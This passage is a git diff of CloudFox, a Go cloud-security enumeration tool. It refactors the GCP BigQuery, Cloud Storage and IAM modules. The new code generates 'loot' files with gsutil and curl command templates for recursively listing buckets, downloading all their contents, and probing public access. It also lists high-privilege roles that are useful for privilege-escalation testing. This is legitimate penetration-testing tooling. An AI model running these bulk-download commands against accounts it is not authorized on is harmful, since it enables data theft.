dataset.Location, - dataset.ProjectID, + publicStatus, + dataset.EncryptionType, + fmt.Sprintf("%d", len(dataset.AccessEntries)), + dataset.CreationTime.Format(time.RFC3339), }) } - datasetTableFile := internal.TableFile{ - Header: datasetHeader, - Body: datasetBody, - Name: "bigquery-datasets", + + // Table table with security columns + tableHeader := []string{ + "Project ID", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Partitioned", + "Rows", + "Size (bytes)", + "Location", } - tableFiles = append(tableFiles, datasetTableFile) - // For Tables - tableHeader := []string{"TableID", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "NumBytes", "Location", "ProjectID"} var tableBody [][]string - for _, table := range g.TablesData { + for _, table := range m.Tables { + partitioned := boolToCheckMark(table.IsPartitioned) + if table.IsPartitioned { + partitioned = table.PartitioningType + } + tableBody = append(tableBody, []string{ - table.TableID, + table.ProjectID, table.DatasetID, - table.Description, - table.CreationTime.Format(time.RFC3339), - table.LastModifiedTime.Format(time.RFC3339), + table.TableID, + table.TableType, + table.EncryptionType, + partitioned, + fmt.Sprintf("%d", table.NumRows), fmt.Sprintf("%d", table.NumBytes), table.Location, - table.ProjectID, }) } - tableTableFile := internal.TableFile{ - Header: tableHeader, - Body: tableBody, - Name: "bigquery-tables", - } - tableFiles = append(tableFiles, tableTableFile) - return tableFiles -} + // Access bindings table (one row per access entry) + accessHeader := []string{ + "Dataset", + "Project ID", + "Location", + "Role", + "Member Type", + "Member", + } -func (g GCPBigQueryResults) LootFiles() []internal.LootFile { - // Implement if there's specific data considered as loot - return []internal.LootFile{} -} + var accessBody [][]string + for _, dataset := range m.Datasets { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + accessBody = append(accessBody, []string{ + dataset.DatasetID, + dataset.ProjectID, + dataset.Location, + entry.Role, + memberType, + entry.Entity, + }) + } + } -func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BIGQUERY_MODULE_NAME) - return + // Public datasets table + publicHeader := []string{ + "Dataset", + "Project ID", + "Location", + "Public Access", + "Encryption", } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BIGQUERY_MODULE_NAME) + var publicBody [][]string + for _, dataset := range m.Datasets { + if dataset.IsPublic { + publicBody = append(publicBody, []string{ + dataset.DatasetID, + dataset.ProjectID, + dataset.Location, + dataset.PublicAccess, + dataset.EncryptionType, + }) + } } - bqService := BigQueryService.New() - var datasetsResults []BigQueryService.BigqueryDataset - var tablesResults []BigQueryService.BigqueryTable - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving BigQuery datasets and tables from project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) - result, err := bqService.BigqueryDatasetsAndTables(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } + } - datasetsResults = append(datasetsResults, result.Datasets...) - tablesResults = append(tablesResults, result.Tables...) - cloudfoxOutput := GCPBigQueryResults{DatasetsData: datasetsResults, TablesData: tablesResults} + // Build tables list + tables := []internal.TableFile{ + { + Name: "bigquery-datasets", + Header: datasetHeader, + Body: datasetBody, + }, + { + Name: "bigquery-tables", + Header: tableHeader, + Body: tableBody, + }, + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BIGQUERY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return - } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + // Add access bindings table if there are entries + if len(accessBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigquery-access", + Header: accessHeader, + Body: accessBody, + }) + } + + // Add public datasets table if there are public datasets + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "bigquery-public", + Header: publicHeader, + Body: publicBody, + }) + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", len(publicBody)), globals.GCP_BIGQUERY_MODULE_NAME) + } + + output := BigQueryOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/buckets.go b/gcp/commands/buckets.go index a0a5944c..437b6459 100644 --- a/gcp/commands/buckets.go +++ b/gcp/commands/buckets.go @@ -1,9 +1,13 @@ package commands import ( + "context" "fmt" + "strings" + "sync" CloudStorageService "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -11,105 +15,443 @@ import ( var GCPBucketsCommand = &cobra.Command{ Use: globals.GCP_BUCKETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP buckets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available bucket information: -cloudfox gcp buckets`, + Aliases: []string{"storage", "gcs"}, + Short: "Enumerate GCP Cloud Storage buckets with security configuration", + Long: `Enumerate GCP Cloud Storage buckets across projects with security-relevant details. + +Features: +- Lists all buckets accessible to the authenticated user +- Shows security configuration (public access prevention, uniform access, versioning) +- Enumerates IAM policies and identifies public buckets +- Shows encryption type (Google-managed vs CMEK) +- Shows retention and soft delete policies +- Generates gcloud commands for further enumeration +- Generates exploitation commands for data access + +Security Columns: +- Public: Whether the bucket has allUsers or allAuthenticatedUsers access +- PublicAccessPrevention: "enforced" prevents public access at org/project level +- UniformAccess: true means IAM-only (no ACLs), recommended for security +- Versioning: Object versioning enabled (helps with recovery/compliance) +- Logging: Access logging enabled (audit trail) +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Retention: Data retention policy (compliance/immutability)`, Run: runGCPBucketsCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BucketsModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPBucketsResults struct { - Data []CloudStorageService.BucketInfo + // Module-specific fields + Buckets []CloudStorageService.BucketInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPBucketsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BucketsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "Location", - "ProjectID", +func (o BucketsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BucketsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBucketsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BUCKETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string + // Create module instance + module := &BucketsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Buckets: []CloudStorageService.BucketInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BucketsModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BUCKETS_MODULE_NAME, m.processProject) + + // Check results + if len(m.Buckets) == 0 { + logger.InfoM("No buckets found", globals.GCP_BUCKETS_MODULE_NAME) + return + } + + // Count public buckets for summary + publicCount := 0 + for _, bucket := range m.Buckets { + if bucket.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s), %d PUBLIC", len(m.Buckets), publicCount), globals.GCP_BUCKETS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d bucket(s)", len(m.Buckets)), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BucketsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating buckets in project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Create service and fetch buckets + cs := CloudStorageService.New() + buckets, err := cs.Buckets(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating buckets in project %s: %v", projectID, err), globals.GCP_BUCKETS_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.Buckets = append(m.Buckets, buckets...) + + // Generate loot for each bucket + for _, bucket := range buckets { + m.addBucketToLoot(bucket) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d bucket(s) in project %s", len(buckets), projectID), globals.GCP_BUCKETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BucketsModule) initializeLootFiles() { + m.LootMap["buckets-gcloud-commands"] = &internal.LootFile{ + Name: "buckets-gcloud-commands", + Contents: "# GCP Cloud Storage Bucket Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-gsutil-commands"] = &internal.LootFile{ + Name: "buckets-gsutil-commands", + Contents: "# GCP gsutil Commands for Data Access\n# Generated by CloudFox\n\n", + } + m.LootMap["buckets-exploitation"] = &internal.LootFile{ + Name: "buckets-exploitation", + Contents: "# GCP Bucket Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["buckets-public"] = &internal.LootFile{ + Name: "buckets-public", + Contents: "# PUBLIC GCP Buckets\n# Generated by CloudFox\n# These buckets have allUsers or allAuthenticatedUsers access!\n\n", + } + m.LootMap["buckets-iam-bindings"] = &internal.LootFile{ + Name: "buckets-iam-bindings", + Contents: "# GCP Bucket IAM Bindings\n# Generated by CloudFox\n\n", + } +} - for _, value := range g.Data { - body = append( - body, - []string{ - value.Name, - value.Location, - value.ProjectID, - }, +func (m *BucketsModule) addBucketToLoot(bucket CloudStorageService.BucketInfo) { + // gcloud commands for enumeration + m.LootMap["buckets-gcloud-commands"].Contents += fmt.Sprintf( + "# Bucket: %s (Project: %s, Location: %s)\n"+ + "gcloud storage buckets describe gs://%s --project=%s\n"+ + "gcloud storage buckets get-iam-policy gs://%s --project=%s\n\n", + bucket.Name, bucket.ProjectID, bucket.Location, + bucket.Name, bucket.ProjectID, + bucket.Name, bucket.ProjectID, + ) + + // gsutil commands for data access + m.LootMap["buckets-gsutil-commands"].Contents += fmt.Sprintf( + "# Bucket: %s\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -L gs://%s/\n"+ + "gsutil du -s gs://%s/\n\n", + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, + ) + + // Exploitation commands + m.LootMap["buckets-exploitation"].Contents += fmt.Sprintf( + "# Bucket: %s\n"+ + "# List all objects recursively:\n"+ + "gsutil ls -r gs://%s/**\n"+ + "# Download all contents:\n"+ + "gsutil -m cp -r gs://%s/ ./loot/%s/\n"+ + "# Check for public access:\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -20\n\n", + bucket.Name, + bucket.Name, + bucket.Name, bucket.Name, + bucket.Name, + ) + + // Public buckets + if bucket.IsPublic { + m.LootMap["buckets-public"].Contents += fmt.Sprintf( + "# BUCKET: %s\n"+ + "# Project: %s\n"+ + "# Public Access: %s\n"+ + "# Public Access Prevention: %s\n"+ + "# Direct URL: https://storage.googleapis.com/%s/\n"+ + "# Console URL: https://console.cloud.google.com/storage/browser/%s\n"+ + "curl -s https://storage.googleapis.com/%s/ | head -50\n"+ + "gsutil ls gs://%s/\n\n", + bucket.Name, + bucket.ProjectID, + bucket.PublicAccess, + bucket.PublicAccessPrevention, + bucket.Name, + bucket.Name, + bucket.Name, + bucket.Name, ) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_BUCKETS_MODULE_NAME, + // IAM bindings + if len(bucket.IAMBindings) > 0 { + m.LootMap["buckets-iam-bindings"].Contents += fmt.Sprintf( + "# Bucket: %s (Project: %s)\n", + bucket.Name, bucket.ProjectID, + ) + for _, binding := range bucket.IAMBindings { + m.LootMap["buckets-iam-bindings"].Contents += fmt.Sprintf( + "# Role: %s\n# Members: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + m.LootMap["buckets-iam-bindings"].Contents += "\n" } - tableFiles = append(tableFiles, tableFile) +} - return tableFiles +// ------------------------------ +// Helper functions +// ------------------------------ +func boolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" } -// Decide what is loot based on resource information -func (g GCPBucketsResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +func boolToCheckMark(b bool) string { + if b { + return "✓" + } + return "-" } -// Houses high-level logic that retrieves resources and writes to output -func runGCPBucketsCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BUCKETS_MODULE_NAME) +// getMemberType extracts the member type from a GCP IAM member string +// Member formats: user:email, serviceAccount:email, group:email, domain:domain, allUsers, allAuthenticatedUsers +func getMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" } +} - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BUCKETS_MODULE_NAME) +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BucketsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table with security-relevant columns + header := []string{ + "Project ID", + "Name", + "Location", + "Public", + "PublicAccessPrevention", + "UniformAccess", + "Versioning", + "Logging", + "Encryption", + "Retention", } - // Get the bucket info using the projectIDs and CloudStorageService - cs := CloudStorageService.New() - var results []CloudStorageService.BucketInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - result, err := cs.Buckets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + var body [][]string + for _, bucket := range m.Buckets { + // Format retention info + retentionInfo := "-" + if bucket.RetentionPolicyEnabled { + if bucket.RetentionPolicyLocked { + retentionInfo = fmt.Sprintf("%dd (LOCKED)", bucket.RetentionPeriodDays) + } else { + retentionInfo = fmt.Sprintf("%dd", bucket.RetentionPeriodDays) + } + } + + // Format public access - highlight if public + publicDisplay := bucket.PublicAccess + if bucket.IsPublic { + publicDisplay = "PUBLIC: " + bucket.PublicAccess + } + + body = append(body, []string{ + bucket.ProjectID, + bucket.Name, + bucket.Location, + publicDisplay, + bucket.PublicAccessPrevention, + boolToCheckMark(bucket.UniformBucketLevelAccess), + boolToCheckMark(bucket.VersioningEnabled), + boolToCheckMark(bucket.LoggingEnabled), + bucket.EncryptionType, + retentionInfo, + }) + } + + // Detailed IAM table - one row per member for granular view + iamHeader := []string{ + "Bucket", + "Project ID", + "Role", + "Member Type", + "Member", + } + + var iamBody [][]string + for _, bucket := range m.Buckets { + for _, binding := range bucket.IAMBindings { + for _, member := range binding.Members { + memberType := getMemberType(member) + iamBody = append(iamBody, []string{ + bucket.Name, + bucket.ProjectID, + binding.Role, + memberType, + member, + }) + } } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all buckets from project: %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) - cloudfoxOutput := GCPBucketsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BUCKETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BUCKETS_MODULE_NAME) - return + } + + // Public buckets table (if any) + publicHeader := []string{ + "Bucket", + "Project ID", + "Public Access", + "Public Access Prevention", + "URL", + } + + var publicBody [][]string + for _, bucket := range m.Buckets { + if bucket.IsPublic { + publicBody = append(publicBody, []string{ + bucket.Name, + bucket.ProjectID, + bucket.PublicAccess, + bucket.PublicAccessPrevention, + fmt.Sprintf("https://storage.googleapis.com/%s/", bucket.Name), + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BUCKETS_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_BUCKETS_MODULE_NAME, + Header: header, + Body: body, + }, + } + + // Add IAM table if there are bindings + if len(iamBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "buckets-iam", + Header: iamHeader, + Body: iamBody, + }) + } + + // Add public buckets table if any + if len(publicBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "buckets-public", + Header: publicHeader, + Body: publicBody, + }) + } + + output := BucketsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BUCKETS_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 4c8b3139..a346b9c8 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -1,9 +1,13 @@ package commands import ( + "context" "fmt" + "strings" + "sync" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -11,112 +15,712 @@ import ( var GCPIAMCommand = &cobra.Command{ Use: globals.GCP_IAM_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP IAM information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display IAM principals and their roles information within GCP resources: -cloudfox gcp iam`, + Aliases: []string{"roles", "permissions"}, + Short: "Enumerate GCP IAM principals, service accounts, groups, and custom roles", + Long: `Enumerate GCP IAM principals and their role bindings with security-focused analysis. + +Features: +- Lists all IAM principals (users, service accounts, groups, domains) +- Shows role assignments per principal with inheritance tracking +- Enumerates service accounts with key information +- Lists custom roles with their permissions +- Identifies groups and their role assignments +- Detects high-privilege roles and public access +- Shows inherited roles from folders and organization +- Generates gcloud commands for privilege escalation testing`, Run: runGCPIAMCommand, } -// Results struct for IAM command that implements the internal.OutputInterface -type GCPIAMResults struct { - Data []IAMService.PrincipalWithRoles +// High-privilege roles that should be flagged +var highPrivilegeRoles = map[string]bool{ + // Owner/Editor + "roles/owner": true, + "roles/editor": true, + // IAM Admin roles + "roles/iam.securityAdmin": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/iam.serviceAccountUser": true, + "roles/iam.workloadIdentityUser": true, + "roles/iam.roleAdmin": true, + // Resource Manager roles + "roles/resourcemanager.projectIamAdmin": true, + "roles/resourcemanager.folderAdmin": true, + "roles/resourcemanager.folderIamAdmin": true, + "roles/resourcemanager.organizationAdmin": true, + // Compute roles + "roles/compute.admin": true, + "roles/compute.instanceAdmin": true, + "roles/compute.osAdminLogin": true, + // Storage roles + "roles/storage.admin": true, + // Functions/Run roles + "roles/cloudfunctions.admin": true, + "roles/cloudfunctions.developer": true, + "roles/run.admin": true, + "roles/run.developer": true, + // Secret Manager + "roles/secretmanager.admin": true, + // Container/Kubernetes + "roles/container.admin": true, + "roles/container.clusterAdmin": true, + // BigQuery + "roles/bigquery.admin": true, + // Deployment Manager + "roles/deploymentmanager.editor": true, + // Cloud Build + "roles/cloudbuild.builds.editor": true, + // Service Usage + "roles/serviceusage.serviceUsageAdmin": true, + // Org Policy + "roles/orgpolicy.policyAdmin": true, } -// TableFiles formats the data for table output, CSV & JSON files -func (g GCPIAMResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type IAMModule struct { + gcpinternal.BaseGCPModule - header := []string{ - "Name", - "Principal Type", - "Role", - "PolicyResourceType", - "PolicyResourceID", + // Module-specific fields + Principals []IAMService.PrincipalWithRoles + ServiceAccounts []IAMService.ServiceAccountInfo + CustomRoles []IAMService.CustomRole + Groups []IAMService.GroupInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type IAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIAMCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAM_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &IAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Principals: []IAMService.PrincipalWithRoles{}, + ServiceAccounts: []IAMService.ServiceAccountInfo{}, + CustomRoles: []IAMService.CustomRole{}, + Groups: []IAMService.GroupInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAM_MODULE_NAME, m.processProject) + + // Check results + if len(m.Principals) == 0 { + logger.InfoM("No IAM principals found", globals.GCP_IAM_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d principal(s), %d service account(s), %d custom role(s), %d group(s)", + len(m.Principals), len(m.ServiceAccounts), len(m.CustomRoles), len(m.Groups)), globals.GCP_IAM_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *IAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAM in project: %s", projectID), globals.GCP_IAM_MODULE_NAME) + } + + // Create service and fetch combined IAM data + iamService := IAMService.New() + iamData, err := iamService.CombinedIAM(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating IAM in project %s: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) + } + return + } + + // Thread-safe append + m.mu.Lock() + m.Principals = append(m.Principals, iamData.Principals...) + m.ServiceAccounts = append(m.ServiceAccounts, iamData.ServiceAccounts...) + m.CustomRoles = append(m.CustomRoles, iamData.CustomRoles...) + m.Groups = append(m.Groups, iamData.Groups...) + + // Generate loot for each principal + for _, principal := range iamData.Principals { + m.addPrincipalToLoot(principal, projectID) + } + + // Generate loot for service accounts + for _, sa := range iamData.ServiceAccounts { + m.addServiceAccountToLoot(sa, projectID) + } + + // Generate loot for custom roles + for _, role := range iamData.CustomRoles { + m.addCustomRoleToLoot(role) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d principal(s), %d SA(s), %d custom role(s), %d group(s) in project %s", + len(iamData.Principals), len(iamData.ServiceAccounts), len(iamData.CustomRoles), len(iamData.Groups), projectID), globals.GCP_IAM_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IAMModule) initializeLootFiles() { + m.LootMap["iam-gcloud-commands"] = &internal.LootFile{ + Name: "iam-gcloud-commands", + Contents: "# GCP IAM Enumeration Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["iam-high-privilege"] = &internal.LootFile{ + Name: "iam-high-privilege", + Contents: "# GCP High-Privilege Principals\n# Generated by CloudFox\n# These principals have elevated permissions\n\n", + } + m.LootMap["iam-service-accounts"] = &internal.LootFile{ + Name: "iam-service-accounts", + Contents: "# GCP Service Account Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["iam-privilege-escalation"] = &internal.LootFile{ + Name: "iam-privilege-escalation", + Contents: "# GCP Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["iam-custom-roles"] = &internal.LootFile{ + Name: "iam-custom-roles", + Contents: "# GCP Custom Roles\n# Generated by CloudFox\n# Review these for overly permissive custom roles\n\n", + } + m.LootMap["iam-service-account-keys"] = &internal.LootFile{ + Name: "iam-service-account-keys", + Contents: "# GCP Service Account Keys\n# Generated by CloudFox\n# User-managed keys are potential security risks\n\n", + } + m.LootMap["iam-groups"] = &internal.LootFile{ + Name: "iam-groups", + Contents: "# GCP Groups with IAM Permissions\n# Generated by CloudFox\n# Consider reviewing group membership for high-privilege roles\n\n", + } + m.LootMap["iam-inherited-roles"] = &internal.LootFile{ + Name: "iam-inherited-roles", + Contents: "# GCP Inherited IAM Roles\n# Generated by CloudFox\n# These roles are inherited from folders or organization\n\n", + } +} + +func (m *IAMModule) addPrincipalToLoot(principal IAMService.PrincipalWithRoles, projectID string) { + hasHighPrivilege := false + var highPrivRoles []string + var inheritedRoles []string + + for _, binding := range principal.PolicyBindings { + if highPrivilegeRoles[binding.Role] { + hasHighPrivilege = true + highPrivRoles = append(highPrivRoles, binding.Role) + } + if binding.IsInherited { + inheritedRoles = append(inheritedRoles, fmt.Sprintf("%s (from %s)", binding.Role, binding.InheritedFrom)) + } + } + + // Track inherited roles + if len(inheritedRoles) > 0 { + m.LootMap["iam-inherited-roles"].Contents += fmt.Sprintf( + "# Principal: %s (Type: %s)\n"+ + "# Inherited Roles:\n", + principal.Name, principal.Type, + ) + for _, role := range inheritedRoles { + m.LootMap["iam-inherited-roles"].Contents += fmt.Sprintf(" - %s\n", role) + } + m.LootMap["iam-inherited-roles"].Contents += "\n" + } + + // Track groups + if principal.Type == "Group" { + var roles []string + for _, binding := range principal.PolicyBindings { + roles = append(roles, binding.Role) + } + hasHighPriv := "" + if hasHighPrivilege { + hasHighPriv = " [HIGH PRIVILEGE]" + } + m.LootMap["iam-groups"].Contents += fmt.Sprintf( + "# Group: %s%s\n"+ + "# Project: %s\n"+ + "# Roles: %s\n"+ + "# Enumerate group membership (requires Admin SDK):\n"+ + "# gcloud identity groups memberships list --group-email=%s\n\n", + principal.Email, hasHighPriv, + projectID, + strings.Join(roles, ", "), + principal.Email, + ) + } + + // 